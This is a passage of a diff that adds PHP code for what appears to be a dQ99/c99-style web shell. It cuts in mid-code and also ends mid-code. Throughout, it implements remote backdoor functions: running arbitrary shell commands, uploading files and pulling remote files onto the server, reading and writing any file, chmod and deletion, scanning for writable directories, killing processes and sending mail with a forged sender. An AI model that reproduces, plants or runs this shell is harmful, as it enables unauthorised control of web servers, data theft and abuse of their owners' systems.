+         "<tr><td>Message:</td><td><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br>".
+         "<input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked> Attach Server info (Recommended for bug-fix)<br>".
+         "*Language: English, Indonesian.</td></tr>".
+         "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
+         "</table>\n";
+  }
+}
+if ($act == "dQmailer") {
+  if (!empty($submit)){
+    $headers = 'To: '.$dest_email."\r\n";
+    $headers .= 'From: '.$sender_name.' '.$sender_email."\r\n";
+    if (mail($suppmail,$sender_subj,$sender_body,$header)) {
+      echo "<center><b>Email sent!</b></center>";
+    }
+    else { echo "<center><b>Can't send email!</b></center>"; }
+  }
+  else {
+    echo "<form action=\"".$surl."\" method=POST>".
+         "<input type=hidden name=act value=dQmailer>".
+         "<table class=contents><tr><td class=barheader colspan=2>".
+         ".: $sh_name Mailer :.</td></tr>".
+         "<tr><td>Your name:</td><td><input type=\"text\" name=\"sender_name\" value=\"".htmlspecialchars($sender_name)."\"></td</tr>".
+         "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"sender_email\" value=\"".htmlspecialchars($sender_email)."\"></td></tr>".
+         "<tr><td>To:</td><td><input type=\"text\" name=\"dest_email\" value=\"".htmlspecialchars($dest_email)."\"></td></tr>".
+         "<tr><td>Subject:</td><td><input size=70 type=\"text\" name=\"sender_subj\" value=\"".htmlspecialchars($sender_subj)."\"></td></tr>".
+         "<tr><td>Message:</td><td><textarea name=\"sender_body\" cols=80 rows=10>".htmlspecialchars($sender_body)."</textarea><br>".
+         "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
+         "</table>\n";
+  }
+}
+if ($act == "search") {
+  echo "<div class=barheader>.: $sh_name File-System Search :.</div>";
+  if (empty($search_in)) {$search_in = $d;}
+  if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+  if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+  if (!empty($submit)) {
+    $found = array();
+    $found_d = 0;
+    $found_f = 0;
+    $search_i_f = 0;
+    $search_i_d = 0;
+    $a = array(
+        "name"=>$search_name,
+        "name_regexp"=>$search_name_regexp,
+        "text"=>$search_text,
+        "text_regexp"=>$search_text_regxp,
+        "text_wwo"=>$search_text_wwo,
+        "text_cs"=>$search_text_cs,
+        "text_not"=>$search_text_not
+    );
+    $searchtime = getmicrotime();
+    $in = array_unique(explode(";",$search_in));
+    foreach($in as $v) {dQ99fsearch($v);}
+    $searchtime = round(getmicrotime()-$searchtime,4);
+    if (count($found) == 0) {echo "No files found!";}
+    else {
+      $ls_arr = $found;
+      $disp_fullpath = TRUE;
+      $act = "ls";
+    }
+  }
+  echo "<table class=contents>".
+       "<tr><td><form method=POST>".
+       "<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">".
+       "File or folder Name:</td><td><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - Regular Expression</td></tr>".
+       "<tr><td>Look in (Separate by \";\"):</td><td><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"></td></tr>".
+       "<tr><td>A word or phrase in the file:</td><td><textarea name=\"search_text\" cols=\"50\" rows=\"5\">".htmlspecialchars($search_text)."</textarea></td></tr>".
+       "<tr><td></td><td><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> Regular Expression".
+       "  <input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> Whole words only".
+       "  <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> Case sensitive".
+       "  <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> Find files NOT containing the text</td></tr>".
+       "<tr><td></td><td><input type=submit name=submit value=\"Search\"></form></td></tr>".
+       "</table>\n";
+  if ($act == "ls") {
+    $dspact = $act;
+    echo $searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b>".
+         "<hr size=\"1\" noshade>";
+  }
+}
+if ($act == "chmod") {
+  $mode = fileperms($d.$f);
+  if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+  else {
+    $form = TRUE;
+    if ($chmod_submit) {
+      $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+      if (chmod($d.$f,$octet)) { $act = "ls"; $form = FALSE; $err = ""; }
+      else {$err = "Can't chmod to ".$octet.".";}
+    }
+    if ($form) {
+      $perms = parse_perms($mode);
+      echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+    }
+  }
+}
+if ($act == "upload") {
+  $uploadmess = "";
+  $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+  if (empty($uploadpath)) {$uploadpath = $d;}
+  elseif (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) {$uploadpath .= DIRECTORY_SEPARATOR;}
+  if (!empty($submit)) {
+    global $_FILES;
+    $uploadfile = $_FILES["uploadfile"];
+    if (!empty($uploadfile["tmp_name"])) {
+      if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+      else {$destin = $userfilename;}
+      if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {
+        $uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";
+      }
+      else { $uploadmess .= "File uploaded successfully!<br>".$uploadpath.$destin; }
+    }
+    else { echo "No file to upload!"; }
+  }
+  if ($miniform) {
+    echo "<b>".$uploadmess."</b>";
+    $act = "ls";
+  }
+  else {
+    echo "<table><tr><td colspan=2 class=barheader>".
+         ".: File Upload :.</td>".
+         "<td colspan=2>".$uploadmess."</td></tr>".
+         "<tr><td><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>".
+         "From Your Computer:</td><td><input name=\"uploadfile\" type=\"file\"></td></tr>".
+         "<tr><td>From URL:</td><td><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"></td></tr>".
+         "<tr><td>Target Directory:</td><td><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"></td></tr>".
+         "<tr><td>Target File Name:</td><td><input name=uploadfilename size=25></td></tr>".
+         "<tr><td></td><td><input type=checkbox name=uploadautoname value=1 id=df4> Convert file name to lowercase</td></tr>".
+         "<tr><td></td><td><input type=submit name=submit value=\"Upload\">".
+         "</form></td></tr></table>";
+  }
+}
+if ($act == "delete") {
+  $delerr = "";
+  foreach ($actbox as $v) {
+    $result = FALSE;
+    $result = fs_rmobj($v);
+    if (!$result) { $delerr .= "Can't delete ".htmlspecialchars($v)."<br>"; }
+  }
+  if (!empty($delerr)) { echo "<b>Error deleting:</b><br>".$delerr; }
+  $act = "ls";
+}
+if (!$usefsbuff) {
+  if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {
+    echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$usefsbuff\" as TRUE.</center>";
+  }
+}
+else {
+  if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); dQ99_sess_put($sess_data); $act = "ls"; }
+  elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); dQ99_sess_put($sess_data); $act = "ls";}
+  elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} dQ99_sess_put($sess_data); $act = "ls";}
+  if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); dQ99_sess_put($sess_data);}
+  elseif ($actpastebuff) {
+    $psterr = "";
+    foreach($sess_data["copy"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+      if ($copy_unset) {unset($sess_data["copy"][$k]);}
+    }
+    foreach($sess_data["cut"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+      unset($sess_data["cut"][$k]);
+    }
+    dQ99_sess_put($sess_data);
+    if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+    $act = "ls";
+  }
+  elseif ($actarcbuff) {
+    $arcerr = "";
+    if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+    else {$ext = ".tar.gz";}
+    if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+    $cmdline .= " ".$actarcbuff_path;
+    $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+    foreach($objects as $v) {
+      $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+      if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+      if (is_dir($v)) {
+        if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+        $v .= "*";
+      }
+      $cmdline .= " ".$v;
+    }
+    $tmp = realpath(".");
+    chdir($d);
+    $ret = dQ99exec($cmdline);
+    chdir($tmp);
+    if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+    $ret = str_replace("\r\n","\n",$ret);
+    $ret = explode("\n",$ret);
+    if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+    foreach($sess_data["cut"] as $k=>$v) {
+      if (in_array($v,$ret)) {fs_rmobj($v);}
+      unset($sess_data["cut"][$k]);
+    }
+    dQ99_sess_put($sess_data);
+    if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+    $act = "ls";
+  }
+  elseif ($actpastebuff) {
+    $psterr = "";
+    foreach($sess_data["copy"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+      if ($copy_unset) {unset($sess_data["copy"][$k]);}
+    }
+    foreach($sess_data["cut"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+      unset($sess_data["cut"][$k]);
+    }
+    dQ99_sess_put($sess_data);
+    if (!empty($psterr)) {echo "<b>Error pasting:</b><br>".$psterr;}
+    $act = "ls";
+  }
+}
+if ($act == "cmd") {
+  @chdir($chdir);
+  if (!empty($submit)) {
+    echo "<div class=barheader>.: Results of Execution :.</div>\n";
+    $olddir = realpath(".");
+    @chdir($d);
+    $ret = dQ99exec($cmd);
+    $ret = convert_cyr_string($ret,"d","w");
+    if ($cmd_txt) {
+      $rows = count(explode("\n",$ret))+1;
+      if ($rows < 10) { $rows = 10; } else { $rows = 30; }
+      $cols = 130;
+      echo "<textarea class=shell cols=\"$cols\" rows=\"$rows\" readonly>".htmlspecialchars($ret)."</textarea>\n";
+      //echo "<div align=left><pre>".htmlspecialchars($ret)."</pre></div>";
+    }
+    else { echo $ret."<br>"; }
+    @chdir($olddir);
+  }
+}
+if ($act == "ls") {
+  if (count($ls_arr) > 0) { $list = $ls_arr; }
+  else {
+    $list = array();
+    if ($h = @opendir($d)) {
+      while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+      closedir($h);
+    }
+  }
+  if (count($list) == 0) { echo "<div class=dQerrmsg>Can't open folder (".htmlspecialchars($d).")!</div>";}
+  else {
+    $objects = array();
+    $vd = "f"; //Viewing mode
+    if ($vd == "f") {
+      $objects["head"] = array();
+      $objects["folders"] = array();
+      $objects["links"] = array();
+      $objects["files"] = array();
+      foreach ($list as $v) {
+        $o = basename($v);
+        $row = array();
+        if ($o == ".") {$row[] = $d.$o; $row[] = "CURDIR";}
+        elseif ($o == "..") {$row[] = $d.$o; $row[] = "UPDIR";}
+        elseif (is_dir($v)) {
+          if (is_link($v)) {$type = "LINK";}
+          else {$type = "DIR";}
+          $row[] = $v;
+          $row[] = $type;
+        }
+        elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+        $row[] = filemtime($v);
+        if (!$win) {
+          $ow = posix_getpwuid(fileowner($v));
+          $gr = posix_getgrgid(filegroup($v));
+          $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+        }
+        $row[] = fileperms($v);
+        if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+        elseif (is_link($v)) {$objects["links"][] = $row;}
+        elseif (is_dir($v)) {$objects["folders"][] = $row;}
+        elseif (is_file($v)) {$objects["files"][] = $row;}
+        $i++;
+      }
+      $row = array();
+      $row[] = "<b>Name</b>";
+      $row[] = "<b>Size</b>";
+      $row[] = "<b>Date Modified</b>";
+      if (!$win) {$row[] = "<b>Owner/Group</b>";}
+      $row[] = "<b>Perms</b>";
+      $row[] = "<b>Action</b>";
+      $parsesort = parsesort($sort);
+      $sort = $parsesort[0].$parsesort[1];
+      $k = $parsesort[0];
+      if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+      $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+      $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
+      $row[$k] .= $y;
+      for($i=0;$i<count($row)-1;$i++) {
+        if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+      }
+      $v = $parsesort[0];
+      usort($objects["folders"], "tabsort");
+      usort($objects["links"], "tabsort");
+      usort($objects["files"], "tabsort");
+      if ($parsesort[1] == "d") {
+        $objects["folders"] = array_reverse($objects["folders"]);
+        $objects["files"] = array_reverse($objects["files"]);
+      }
+      $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+      $tab = array();
+      $tab["cols"] = array($row);
+      $tab["head"] = array();
+      $tab["folders"] = array();
+      $tab["links"] = array();
+      $tab["files"] = array();
+      $i = 0;
+      foreach ($objects as $a) {
+        $v = $a[0];
+        $o = basename($v);
+        $dir = dirname($v);
+        if ($disp_fullpath) {$disppath = $v;}
+        else {$disppath = $o;}
+        $disppath = str2mini($disppath,60);
+        if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+        elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+        foreach ($regxp_highlight as $r) {
+          if (ereg($r[0],$o)) {
+            if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; dQ99shexit();}
+            else {
+              $r[1] = round($r[1]);
+              $isdir = is_dir($v);
+              if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) {
+                if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+                $disppath = $r[2].$disppath.$r[3];
+                if ($r[4]) {break;}
+              }
+            }
+          }
+        }
+        $uo = urlencode($o);
+        $ud = urlencode($dir);
+        $uv = urlencode($v);
+        $row = array();
+        if ($o == ".") {
+          $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;".$o."</a>";
+          $row[] = "CURDIR";
+        }
+        elseif ($o == "..") {
+          $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\">&nbsp;".$o."</a>";
+          $row[] = "UPDIR";
+        }
+        elseif (is_dir($v)) {
+          if (is_link($v)) {
+            $disppath .= " => ".readlink($v);
+            $type = "LINK";
+            $row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\">&nbsp;[".$disppath."]</a>";
+          }
+          else {
+            $type = "DIR";
+            $row[] =  "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;[".$disppath."]</a>";
+          }
+          $row[] = $type;
+        }
+        elseif(is_file($v)) {
+          $ext = explode(".",$o);
+          $c = count($ext)-1;
+          $ext = $ext[$c];
+          $ext = strtolower($ext);
+          $row[] =  "<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$disppath."</a>";
+          $row[] = view_size($a[1]);
+        }
+        $row[] = @date("d.m.Y H:i:s",$a[2]);
+        if (!$win) { $row[] = $a[3]; }
+        $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+        if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+        else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+        if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" border=\"0\"></a>&nbsp;".$checkbox;}
+        else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" border=\"0\"></a>&nbsp;".$checkbox;}
+        if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+        elseif (is_link($v)) {$tab["links"][] = $row;}
+        elseif (is_dir($v)) {$tab["folders"][] = $row;}
+        elseif (is_file($v)) {$tab["files"][] = $row;}
+        $i++;
+      }
+    }
+    // Compiling table
+    $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+    echo "<div class=barheader>.: ";
+    if (!empty($dQ_infohead)) { echo $dQ_infohead; }
+    else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; }
+    echo " :.</div>\n";
+    echo "<form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=\"".$dspact."\"><input type=hidden name=d value=".$d.">".
+         "<table class=explorer>";
+    foreach($table as $row) {
+      echo "<tr>";
+      foreach($row as $v) {echo "<td>".$v."</td>";}
+      echo "</tr>\r\n";
+    }
+    echo "</table>".
+         "<script>".
+         "function ls_setcheckboxall(status) {".
+         " var id = 1; var num = ".(count($table)-2).";".
+         " while (id <= num) { document.getElementById('actbox'+id).checked = status; id++; }".
+         "}".
+         "function ls_reverse_all() {".
+         " var id = 1; var num = ".(count($table)-2).";".
+         " while (id <= num) { document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++; }".
+         "}".
+         "</script>".
+         "<div align=\"right\">".
+         "<input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">".
+         "<img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+    if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) {
+      echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"dQ_archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+    echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+    echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+    if ($usefsbuff) {
+      echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+      echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+      echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+    }
+    echo "</select>&nbsp;<input type=submit value=\"Confirm\"></div>";
+    echo "</form>";
+  }
+}
+if ($act == "tools") { tools(); }
+##[ PHP FILESYSTEM TRICKZ (By diKi) ]##
+if ($act == "phpfsys") { 
+  echo "<div align=left>";
+  $fsfunc = $phpfsysfunc;
+  if ($fsfunc=="copy") {
+    if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";}
+    else { echo "<b>Success!</b> $arg1 copied to $arg2\n"; }
+  }
+  elseif ($fsfunc=="rename") {
+    if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";}
+    else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n"; }
+  }
+  elseif ($fsfunc=="chmod") {
+    if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";}
+    else { echo "<b>Perm for $arg1 changed to $arg2!</b>\n"; }
+  }
+  elseif ($fsfunc=="read") {
+    $darg = $d.$arg1;
+    if ($hasil = @file_get_contents($darg)) {
+      echo "<b>Filename:</b> ".$darg."<br>";
+      echo "<center><textarea cols=135 rows=30>";
+      echo htmlentities($hasil);
+      echo "</textarea></center>\n";
+    }
+    else { echo "<div class=dQerrmsg> Couldn't open ".$darg."<div>"; }
+  }
+  elseif ($fsfunc=="write") {
+    $darg = $d.$arg1;
+    if(@file_put_contents($darg,$arg2)) {
+      echo "<b>Saved!</b> ".$darg;
+
+    }
+    else { echo "<div class=dQerrmsg>Can't write to $darg!</div>"; }
+  }
+  elseif ($fsfunc=="downloadbin") {
+    $handle = fopen($arg1, "rb");
+    $contents = '';
+    while (!feof($handle)) {
+      $contents .= fread($handle, 8192);
+    }
+    $r = @fopen($d.$arg2,'w');
+    if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
+    else { echo "<div class=dQerrmsg>Can't write to ".$d.$arg2."!</div>"; }
+    fclose($r);
+    fclose($handle);
+  }
+  elseif ($fsfunc=="download") {
+    $text = implode('', file($arg1));
+    if ($text) {
+      $r = @fopen($d.$arg2,'w');
+      if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
+      else { echo "<div class=dQerrmsg>Can't write to ".$d.$arg2."!</div>"; }
+      fclose($r);
+    }
+    else { echo "<div class=dQerrmsg>Can't download from $arg1!</div>";}
+  }
+  elseif ($fsfunc=='mkdir') {
+    $thedir = $d.$arg1;
+    if ($thedir != $d) {
+      if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); }
+      elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); }
+      else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}
+    }
+    else { echo "Can't create current dir:<b> $thedir</b>"; }
+  }
+  elseif ($fsfunc=='fwritabledir') {
+    function recurse_dir($dir,$max_dir) {
+      global $dir_count;
+      $dir_count++;
+      if( $cdir = dir($dir) ) {
+        while( $entry = $cdir-> read() ) {
+          if( $entry != '.' && $entry != '..' ) {
+            if(is_dir($dir.$entry) && is_writable($dir.$entry) ) {
+             if ($dir_count > $max_dir) { return; }
+              echo "[".$dir_count."] ".$dir.$entry."\n";
+              recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);
+            }
+          }
+        }
+        $cdir->close();
+      }
+    }
+    if (!$arg1) { $arg1 = $d; }
+    if (!$arg2) { $arg2 = 10; }
+    if (is_dir($arg1)) {
+      echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<hr noshade size=1>";
+      echo "<pre>";
+      recurse_dir($arg1,$arg2);
+      echo "</pre>";
+      $total = $dir_count - 1;
+      echo "<hr noshade size=1><b>Founds:</b> ".$total." of <b>Max</b> $arg2";
+    }
+    else {
+      echo "<div class=dQerrmsg>Directory is not exist or permission denied!</div>";
+    }
+  }
+  else {
+    if (!$arg1) { echo "<div class=dQerrmsg>No operation! Please fill parameter [A]!</div>\n"; }
+    else {
+      if ($hasil = $fsfunc($arg1)) {
+        echo "<b>Result of $fsfunc $arg1:</b><br>";
+        if (!is_array($hasil)) { echo "$hasil\n"; }
+        else {
+          echo "<pre>";
+          foreach ($hasil as $v) { echo $v."\n"; }
+          echo "</pre>";
+        }
+      }
+      else { echo "<div class=dQerrmsg>$fsfunc $arg1 failed!</div>\n"; }
+    }
+  }
+  echo "</div>\n";
+}
+if ($act == "processes") {
+  echo "<div class=barheader>.: Processes :.</div>\n";
+  if (!$win) { $handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":""); }
+  else { $handler = "tasklist"; }
+  $ret = dQ99exec($handler);
+  if (!$ret) { echo "Can't execute \"".$handler."\"!"; }
+  else {
+    if (empty($processes_sort)) { $processes_sort = $sort_default; }
+    $parsesort = parsesort($processes_sort);
+    if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+    $k = $parsesort[0];
+    if ($parsesort[1] != "a") {
+      $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>";
+    }
+    else {
+      $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";
+    }
+    $ret = htmlspecialchars($ret);
+    if (!$win) { //Not Windows
+      if ($pid) {
+        if (is_null($sig)) { $sig = 9; }
+        echo "Sending signal ".$sig." to #".$pid."... ";
+        if (posix_kill($pid,$sig)) { echo "OK."; } else { echo "ERROR."; }
+      }
+      while (ereg("  ",$ret)) { $ret = str_replace("  "," ",$ret); }
+      $stack = explode("\n",$ret);
+      $head = explode(" ",$stack[0]);
+      unset($stack[0]);
+      for($i=0;$i<count($head);$i++) {
+        if ($i != $k) {
+          $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";
+        }
+      }
+      $head[$i] = "";
+      $prcs = array();
+      foreach ($stack as $line) {
+        if (!empty($line)) {
+          $line = explode(" ",$line);
+          $line[10] = join(" ",array_slice($line,10));
+          $line = array_slice($line,0,11);
+          if ($line[0] == get_current_user()) { $line[0] = "<font color=green>".$line[0]."</font>"; }
+          $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+          $prcs[] = $line;
+        }
+      }
+    }
+    //For Windows - Fixed By diKi
+    else {
